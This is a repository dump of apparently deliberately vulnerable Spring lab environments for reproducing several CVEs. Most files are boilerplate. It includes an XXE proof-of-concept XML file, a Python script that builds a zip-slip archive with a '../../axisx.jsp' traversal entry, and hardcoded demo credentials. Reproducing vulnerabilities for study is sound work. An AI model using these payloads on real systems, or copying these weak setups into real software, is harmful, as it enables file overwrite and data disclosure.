--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-instrument-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-instrument-tomcat-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-jdbc-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-jms-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-orm-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-oxm-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-struts-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-test-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-tx-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-web-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/spring-webmvc-portlet-3.2.4.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/standard.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/standard.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/xml-apis-1.4.01.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xml-apis-1.4.01.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/xml-resolver-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xml-resolver-1.2.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/xmlpull-1.1.3.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xmlpull-1.1.3.1.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/xmlschema-core-2.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xmlschema-core-2.2.1.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/xpp3_min-1.1.4c.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xpp3_min-1.1.4c.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/lib/xstream-1.4.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2013-4152/web/WEB-INF/lib/xstream-1.4.6.jar
--------------------------------------------------------------------------------
/CVE-2013-4152/web/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
7 | CVE-2013-4152
8 |
9 | spring
10 |
11 | org.springframework.web.servlet.DispatcherServlet
12 |
13 | 1
14 |
15 |
16 | spring
17 | /
18 |
19 |
20 |
21 | index.jsp
22 |
23 |
--------------------------------------------------------------------------------
/CVE-2013-4152/web/index.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: dxy
4 | Date: 2022/12/20
5 | Time: 3:29 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | $Title$
12 |
13 |
14 | CVE-2013-4152
15 |
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2013-4152/web/resources/poc.xml:
--------------------------------------------------------------------------------
1 |
2 |
4 |
5 | ]>
6 | &xxe;
--------------------------------------------------------------------------------
/CVE-2016-4977/src/main/java/com/example/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;
6 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer;
7 | import org.springframework.web.bind.annotation.RestController;
8 |
9 | @SpringBootApplication
10 | @RestController
11 | @EnableResourceServer
12 | @EnableAuthorizationServer
13 | public class DemoApplication {
14 |
15 | public static void main(String[] args) {
16 | SpringApplication.run(DemoApplication.class, args);
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/CVE-2016-4977/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | security.oauth2.client.clientId: acme
2 | security.oauth2.client.clientSecret: acmesecret
3 | security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password
4 | security.oauth2.client.scope: openid
5 | security.oauth2.client.registered-redirect-uri: http://localhost
6 | security.user.password: password
7 | server.port=8099
8 | server.address=10.128.5.250
--------------------------------------------------------------------------------
/CVE-2016-4977/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | security.oauth2.client.clientId: acme
2 | security.oauth2.client.clientSecret: acmesecret
3 | security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password
4 | security.oauth2.client.scope: openid
5 | security.oauth2.client.registered-redirect-uri: http://localhost
6 | security.user.password: password
7 | server.port=8099
8 | server.address=10.128.5.250
--------------------------------------------------------------------------------
/CVE-2016-4977/target/classes/com/example/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2016-4977/target/classes/com/example/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2017-8046/build.gradle:
--------------------------------------------------------------------------------
1 | plugins {
2 | id 'org.springframework.boot' version '2.7.0'
3 | id 'io.spring.dependency-management' version '1.0.11.RELEASE'
4 | id 'java'
5 | }
6 |
7 | group = 'com.example'
8 | version = '0.0.1-SNAPSHOT'
9 | sourceCompatibility = '1.8'
10 |
11 | repositories {
12 | mavenCentral()
13 | }
14 |
15 | dependencies {
16 | implementation 'org.springframework.boot:spring-boot-starter-data-jpa'
17 | implementation 'org.springframework.boot:spring-boot-starter-data-rest'
18 | runtimeOnly 'com.h2database:h2'
19 | testImplementation 'org.springframework.boot:spring-boot-starter-test'
20 | }
21 |
22 | test {
23 | useJUnitPlatform()
24 | }
25 |
--------------------------------------------------------------------------------
/CVE-2017-8046/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/CVE-2017-8046/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
1 | distributionBase=GRADLE_USER_HOME
2 | distributionPath=wrapper/dists
3 | distributionUrl=https\://services.gradle.org/distributions/gradle-7.4.2-bin.zip
4 | zipStoreBase=GRADLE_USER_HOME
5 | zipStorePath=wrapper/dists
6 |
--------------------------------------------------------------------------------
/CVE-2017-8046/settings.gradle:
--------------------------------------------------------------------------------
1 | rootProject.name = 'accessing-data-rest'
2 |
--------------------------------------------------------------------------------
/CVE-2017-8046/src/main/java/com/example/accessingdatarest/AccessingDataRestApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.accessingdatarest;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class AccessingDataRestApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(AccessingDataRestApplication.class, args);
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/CVE-2017-8046/src/main/java/com/example/accessingdatarest/Person.java:
--------------------------------------------------------------------------------
1 | package com.example.accessingdatarest;
2 |
3 | import javax.persistence.Entity;
4 | import javax.persistence.GeneratedValue;
5 | import javax.persistence.GenerationType;
6 | import javax.persistence.Id;
7 |
8 | @Entity
9 | public class Person {
10 |
11 | @Id
12 | @GeneratedValue(strategy = GenerationType.AUTO)
13 | private long id;
14 |
15 | private String firstName;
16 | private String lastName;
17 |
18 | public String getFirstName() {
19 | return firstName;
20 | }
21 |
22 | public void setFirstName(String firstName) {
23 | this.firstName = firstName;
24 | }
25 |
26 | public String getLastName() {
27 | return lastName;
28 | }
29 |
30 | public void setLastName(String lastName) {
31 | this.lastName = lastName;
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/CVE-2017-8046/src/main/java/com/example/accessingdatarest/PersonRepository.java:
--------------------------------------------------------------------------------
1 | package com.example.accessingdatarest;
2 |
3 | import java.util.List;
4 |
5 | import org.springframework.data.repository.PagingAndSortingRepository;
6 | import org.springframework.data.repository.query.Param;
7 | import org.springframework.data.rest.core.annotation.RepositoryRestResource;
8 |
9 | @RepositoryRestResource(collectionResourceRel = "people", path = "people")
10 | public interface PersonRepository extends PagingAndSortingRepository {
11 |
12 | List findByLastName(@Param("name") String name);
13 |
14 | }
15 |
--------------------------------------------------------------------------------
/CVE-2017-8046/target/classes/com/example/accessingdatarest/AccessingDataRestApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/classes/com/example/accessingdatarest/AccessingDataRestApplication.class
--------------------------------------------------------------------------------
/CVE-2017-8046/target/classes/com/example/accessingdatarest/Person.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/classes/com/example/accessingdatarest/Person.class
--------------------------------------------------------------------------------
/CVE-2017-8046/target/classes/com/example/accessingdatarest/PersonRepository.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/classes/com/example/accessingdatarest/PersonRepository.class
--------------------------------------------------------------------------------
/CVE-2017-8046/target/test-classes/com/example/accessingdatarest/AccessingDataRestApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2017-8046/target/test-classes/com/example/accessingdatarest/AccessingDataRestApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2018-1259/src/main/java/example/users/Application.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015-2018 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package example.users;
17 |
18 | import org.springframework.boot.SpringApplication;
19 | import org.springframework.boot.autoconfigure.SpringBootApplication;
20 |
21 | /**
22 | * @author Oliver Gierke
23 | */
24 | @SpringBootApplication
25 | public class Application {
26 |
27 | public static void main(String[] args) {
28 | SpringApplication.run(Application.class, args);
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/CVE-2018-1259/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | logging.level.org.springframework.web.client=DEBUG
2 | server.address=10.128.5.250
3 | server.port=8099
4 |
--------------------------------------------------------------------------------
/CVE-2018-1259/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | logging.level.org.springframework.web.client=DEBUG
2 | server.address=10.128.5.250
3 | server.port=8099
4 |
--------------------------------------------------------------------------------
/CVE-2018-1259/target/classes/example/users/Application.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1259/target/classes/example/users/Application.class
--------------------------------------------------------------------------------
/CVE-2018-1259/target/classes/example/users/UserController$UserPayload.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1259/target/classes/example/users/UserController$UserPayload.class
--------------------------------------------------------------------------------
/CVE-2018-1259/target/classes/example/users/UserController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1259/target/classes/example/users/UserController.class
--------------------------------------------------------------------------------
/CVE-2018-1260/src/main/java/com/example/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;
6 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer;
7 | import org.springframework.web.bind.annotation.RestController;
8 |
9 | @SpringBootApplication
10 | @RestController
11 | @EnableResourceServer
12 | @EnableAuthorizationServer
13 | public class DemoApplication {
14 |
15 | public static void main(String[] args) {
16 | SpringApplication.run(DemoApplication.class, args);
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/CVE-2018-1260/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | security.oauth2.client.clientId: acme
2 | security.oauth2.client.clientSecret: acmesecret
3 | security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password
4 | security.oauth2.client.scope: openid
5 | security.oauth2.client.registered-redirect-uri: http://localhost
6 | security.user.password: password
--------------------------------------------------------------------------------
/CVE-2018-1260/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | security.oauth2.client.clientId: acme
2 | security.oauth2.client.clientSecret: acmesecret
3 | security.oauth2.client.authorized-grant-types: authorization_code,refresh_token,password
4 | security.oauth2.client.scope: openid
5 | security.oauth2.client.registered-redirect-uri: http://localhost
6 | security.user.password: password
--------------------------------------------------------------------------------
/CVE-2018-1260/target/classes/com/example/DefaultOAuth2RequestValidator.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1260/target/classes/com/example/DefaultOAuth2RequestValidator.class
--------------------------------------------------------------------------------
/CVE-2018-1260/target/classes/com/example/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1260/target/classes/com/example/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2018-1260/target/classes/com/example/OAuthSecurityConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1260/target/classes/com/example/OAuthSecurityConfig.class
--------------------------------------------------------------------------------
/CVE-2018-1261/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/#build-image)
9 | * [Spring Integration Test Module Reference Guide](https://docs.spring.io/spring-integration/reference/html/testing.html)
10 | * [Spring Integration](https://docs.spring.io/spring-boot/docs/2.6.9/reference/htmlsingle/#messaging.spring-integration)
11 |
12 | ### Guides
13 | The following guides illustrate how to use some features concretely:
14 |
15 | * [Integrating Data](https://spring.io/guides/gs/integration/)
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2018-1261/cve_2018_1261.py:
--------------------------------------------------------------------------------
1 | import zipfile
2 |
3 | if __name__ == "__main__":
4 | try:
5 | binary = b'this is a axisx test'
6 | zipFile = zipfile.ZipFile("./src/main/resources/test.zip", "a", zipfile.ZIP_DEFLATED)
7 | info = zipfile.ZipInfo("test.zip")
8 | zipFile.writestr("../../axisx.jsp", binary)
9 | zipFile.close()
10 | except IOError as e:
11 | raise e
--------------------------------------------------------------------------------
/CVE-2018-1261/src/main/java/com/example/demo/ZipHeaders.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015-2016 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package com.example.demo;
17 |
18 | /**
19 | * Zip adapter specific message headers.
20 | * @author Gunnar Hillert
21 | * @since 1.0
22 | */
23 | public abstract class ZipHeaders {
24 |
25 | public static final String PREFIX = "zip_";
26 |
27 | public static final String ZIP_ENTRY_FILE_NAME = PREFIX + "entryFilename";
28 |
29 | public static final String ZIP_ENTRY_PATH = PREFIX + "entryPath";
30 |
31 | public static final String ZIP_ENTRY_LAST_MODIFIED_DATE = PREFIX + "entryLastModifiedDate";
32 |
33 | }
34 |
--------------------------------------------------------------------------------
/CVE-2018-1261/src/main/java/com/example/demo/ZipResultType.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015-2016 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package com.example.demo;
17 |
18 | /**
19 | * @author Gunnar Hillert
20 | * @since 1.0
21 | */
22 | public enum ZipResultType {
23 |
24 | FILE, BYTE_ARRAY
25 |
26 | }
27 |
--------------------------------------------------------------------------------
/CVE-2018-1261/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CVE-2018-1261/src/main/resources/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/src/main/resources/test.zip
--------------------------------------------------------------------------------
/CVE-2018-1261/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | //package com.example.demo;
2 | //
3 | //import org.junit.jupiter.api.Test;
4 | //import org.springframework.boot.test.context.SpringBootTest;
5 | //
6 | //@SpringBootTest
7 | //class DemoApplicationTests {
8 | //
9 | // @Test
10 | // void contextLoads() {
11 | // }
12 | //
13 | //}
14 |
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/application.properties:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/AbstractZipTransformer.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/AbstractZipTransformer.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/SpringZipUtils.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/SpringZipUtils.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer$1.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/UnZipTransformer.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/ZipHeaders.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/ZipHeaders.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/ZipResultType.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/ZipResultType.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/com/example/demo/ZipTransformer.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/com/example/demo/ZipTransformer.class
--------------------------------------------------------------------------------
/CVE-2018-1261/target/classes/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1261/target/classes/test.zip
--------------------------------------------------------------------------------
/CVE-2018-1270/build.gradle:
--------------------------------------------------------------------------------
1 | buildscript {
2 | repositories {
3 | mavenCentral()
4 | }
5 | dependencies {
6 | classpath("org.springframework.boot:spring-boot-gradle-plugin:2.0.0.RELEASE")
7 | }
8 | }
9 |
10 | apply plugin: 'java'
11 | apply plugin: 'eclipse'
12 | apply plugin: 'org.springframework.boot'
13 | apply plugin: 'io.spring.dependency-management'
14 |
15 | jar {
16 | baseName = 'gs-messaging-stomp-websocket'
17 | version = '0.1.0'
18 | }
19 | sourceCompatibility = 1.8
20 | targetCompatibility = 1.8
21 |
22 | repositories {
23 | mavenCentral()
24 | }
25 |
26 | dependencies {
27 | compile("org.springframework.boot:spring-boot-starter-websocket")
28 | compile("org.webjars:webjars-locator-core")
29 | compile("org.webjars:sockjs-client:1.0.2")
30 | compile("org.webjars:stomp-websocket:2.3.3")
31 | compile("org.webjars:bootstrap:3.3.7")
32 | compile("org.webjars:jquery:3.1.0")
33 |
34 | testCompile("org.springframework.boot:spring-boot-starter-test")
35 | }
36 |
37 |
--------------------------------------------------------------------------------
/CVE-2018-1270/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/CVE-2018-1270/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
1 | #Thu Mar 01 09:09:11 CST 2018
2 | distributionBase=GRADLE_USER_HOME
3 | distributionPath=wrapper/dists
4 | zipStoreBase=GRADLE_USER_HOME
5 | zipStorePath=wrapper/dists
6 | distributionUrl=https\://services.gradle.org/distributions/gradle-4.6-bin.zip
7 |
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/Application.java:
--------------------------------------------------------------------------------
1 | package hello;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class Application {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(Application.class, args);
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/Greeting.java:
--------------------------------------------------------------------------------
1 | package hello;
2 |
3 | public class Greeting {
4 |
5 | private String content;
6 |
7 | public Greeting() {
8 | }
9 |
10 | public Greeting(String content) {
11 | this.content = content;
12 | }
13 |
14 | public String getContent() {
15 | return content;
16 | }
17 |
18 | }
19 |
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/GreetingController.java:
--------------------------------------------------------------------------------
1 | package hello;
2 |
3 | import org.springframework.messaging.handler.annotation.MessageMapping;
4 | import org.springframework.messaging.handler.annotation.SendTo;
5 | import org.springframework.stereotype.Controller;
6 |
7 | @Controller
8 | public class GreetingController {
9 | @MessageMapping("/hello")
10 | @SendTo("/topic/greetings")
11 | public Greeting greeting(HelloMessage message) throws Exception {
12 | Thread.sleep(1000); // simulated delay
13 | return new Greeting("Hello, " + message.getName() + "!");
14 | }
15 |
16 | }
17 |
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/HelloMessage.java:
--------------------------------------------------------------------------------
1 | package hello;
2 |
3 | public class HelloMessage {
4 |
5 | private String name;
6 |
7 | public HelloMessage() {
8 | }
9 |
10 | public HelloMessage(String name) {
11 | this.name = name;
12 | }
13 |
14 | public String getName() {
15 | return name;
16 | }
17 |
18 | public void setName(String name) {
19 | this.name = name;
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/WebSocketConfig.java:
--------------------------------------------------------------------------------
1 | package hello;
2 |
3 | import org.springframework.context.annotation.Configuration;
4 | import org.springframework.messaging.simp.config.MessageBrokerRegistry;
5 | import org.springframework.web.socket.config.annotation.EnableWebSocketMessageBroker;
6 | import org.springframework.web.socket.config.annotation.StompEndpointRegistry;
7 | import org.springframework.web.socket.config.annotation.WebSocketMessageBrokerConfigurer;
8 |
9 | @Configuration
10 | @EnableWebSocketMessageBroker
11 | public class WebSocketConfig implements WebSocketMessageBrokerConfigurer {
12 |
13 | @Override
14 | public void configureMessageBroker(MessageBrokerRegistry config) {
15 | config.enableSimpleBroker("/topic");
16 | config.setApplicationDestinationPrefixes("/app");
